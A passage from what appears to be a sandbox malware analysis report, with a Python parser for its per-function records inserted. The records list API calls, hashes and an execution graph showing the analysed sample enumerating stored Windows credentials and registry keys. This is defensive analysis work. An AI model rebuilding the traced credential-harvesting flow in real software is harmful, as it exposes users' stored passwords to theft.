• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
• Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
• Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
• Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
• Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
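The function records on this page all follow one grammar: an APIs list (with "Part of subcall function" sub-bullets for helpers), a Memory Dump Source block and a Similarity block of IDs and fuzzy hashes. The parser below is an added example, not Joe Sandbox code: it turns two of the records above (the _lng.ini path builder and the shell32.dll / SHGetSpecialFolderPathW resolver, copied here as constructed sample input) into structured objects, splits the '$'-joined String ID, and flags a literal export name passed to GetProcAddress next to a LoadLibrary* call as a dynamically resolved import that will not appear in the PE import table. The bullet labels are the report's own; the line grammar and the helper names are assumptions inferred from the visible records.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity blocks) into structured data so API sequences, strings and fuzzy
hashes can be hunted across reports instead of read block by block.
Added example, not Joe Sandbox tooling; the line grammar is an assumption
inferred from the records on this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from the report above, trimmed, with
# the page indentation and "Download File" link labels removed.
SAMPLE = r"""
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
• Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
• Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
"""

# "• [Part of subcall function CALLER: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# "• Label: value" bullets of the Memory Dump Source and Similarity blocks
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                # address of the call site
    subcall: Optional[str]  # caller address when marked "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # Memory Dump Source + Similarity bullets
    associated: list = field(default_factory=list)  # further memory regions of the dump


def parse_records(text: str) -> list:
    """Each "APIs" header opens a new record; bullets fill the current one.
    Bare section headers ("Strings", "Similarity", ...) match neither regex."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m and m["key"] == "Associated":
            cur.associated.append(m["val"])
        elif m:
            cur.fields[m["key"]] = m["val"]
    return records


def strings_of(rec: FunctionRecord) -> list:
    """The report packs the referenced strings into one "String ID" joined by '$'."""
    return [s for s in rec.fields.get("String ID", "").split("$") if s]


def dynamic_imports(rec: FunctionRecord) -> list:
    """Export names resolved at run time: a literal name passed to GetProcAddress
    in a function that also calls LoadLibrary*, so the import never shows in the IAT."""
    if not any(a.name.startswith("LoadLibrary") for a in rec.apis):
        return []
    return [a.args[-1] for a in rec.apis if a.name == "GetProcAddress"
            and len(a.args) >= 2 and not re.fullmatch(r"[0-9A-F]{8}|\?", a.args[-1])]
```

`parse_records(SAMPLE)` yields two records; `dynamic_imports` is empty for the first and returns `SHGetSpecialFolderPathW` for the second. The "Part of subcall" bullets keep their caller address in `subcall`, so the API sequence of the function itself can be separated from that of its helpers before the Instruction Fuzzy Hash is used to re-find the function in other samples.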
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0040A159
• SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: LongWindow
• String ID: MZ@
• API String ID: 1378638983-2978689999
• Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
• Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
• Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
• Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
APIs
• memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
• memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
• memset.MSVCRT ref: 0042BAAE
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
• Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
• Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
• Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
APIs
  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
• ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
• Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
• Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
• Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
• Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
• Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
• Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
• Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
• Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
APIs
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: wcslen$wcscat$wcscpy
• String ID:
• API String ID: 1961120804-0
• Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
• Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 19.9%
Signature Coverage: 0.5%
Total number of Nodes: 871
Total number of Limit Nodes: 22
execution_graph: [interactive graph widget data rendered as text; each entry is a node id, a function address in the 0x400000 image, and either a summary such as "N API calls" or the API names observed at that node, followed by "id->id" edges. The root chain runs from the CRT entry (444c4a: GetModuleHandleA, __set_app_type, _initterm, __getmainargs, GetStartupInfoA) into 40cf44 (LoadLibraryA, CoInitialize, RegisterClassA, CreateWindowExA, message loop) and the 44b3cf region (GetModuleHandleA, GetProcAddress, VirtualProtect). Full node/edge list not reproduced.]
FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 40 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 40 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 47 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 47 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 47 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33699 403e73 33698->33699 33700 403e46 _mbscpy 33698->33700 33860 40fb00 33699->33860 33912 40f334 334 API calls 33700->33912 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33913 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33913 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33914 4021b6 memset 33716->33914 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33915 4023e5 16 API calls 33719->33915 33720->33719 33723 4085e2 33722->33723 33916 4082cd 11 API calls 33723->33916 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 
33919 410b62 RegEnumKeyExA 33729->33919 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33920 410a9c RegOpenKeyExA 33731->33920 33923 410b62 RegEnumKeyExA 33731->33923 33732->33728 33921 410add RegQueryValueExA 33734->33921 33737 408694 33922 40848b 10 API calls 33737->33922 33739 4086ab RegCloseKey 33739->33731 33924 410a9c RegOpenKeyExA 33740->33924 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33925 410b62 RegEnumKeyExA 33744->33925 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33926 410a9c RegOpenKeyExA 33748->33926 33927 4080ed 11 API calls 33748->33927 33928 410b62 RegEnumKeyExA 33748->33928 33751 4082a2 RegCloseKey 33751->33748 33929 4045db 33752->33929 33755 4088f7 33937 404656 33755->33937 33757 40872d 33757->33755 33759 408737 wcslen 33757->33759 33761 4088ef LocalFree 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33761->33755 33762 40877a wcsncmp 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 40 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 40 API calls 33786->33946 33947 410b62 RegEnumKeyExA 33786->33947 33789->33778 
33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403122 RegCloseKey 33803->33801 33804 410b1e 3 API calls 33805 403058 memset sprintf 33804->33805 33950 410a9c RegOpenKeyExA 33805->33950 33807 403033 33807->33803 33807->33804 33808 4030a2 memset 33807->33808 33809 410b62 RegEnumKeyExA 33807->33809 33811 4030f9 RegCloseKey 33807->33811 33952 402db3 26 API calls 33807->33952 33951 410b62 RegEnumKeyExA 33808->33951 33809->33807 33811->33807 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 33848->33911 33850 40382e 33851 406f06 2 API calls 
33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33478 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 33908->33672 33909->33676 33910->33680 33911->33698 
33912->33699 33913->33713 33914->33718 33915->33714 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33727 33919->33731 33920->33731 33921->33737 33922->33739 33923->33731 33924->33742 33925->33748 33926->33748 33927->33751 33928->33748 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33755 33932->33757 33932->33760 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33807 33950->33807 33951->33807 33952->33807 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 33990->33991 33992 404785 FreeLibrary 33991->33992 
33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34066 444196 52 API calls 34033->34066 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34063 407f90 34037->34063 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34067 407e62 strcmp strcmp 34041->34067 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 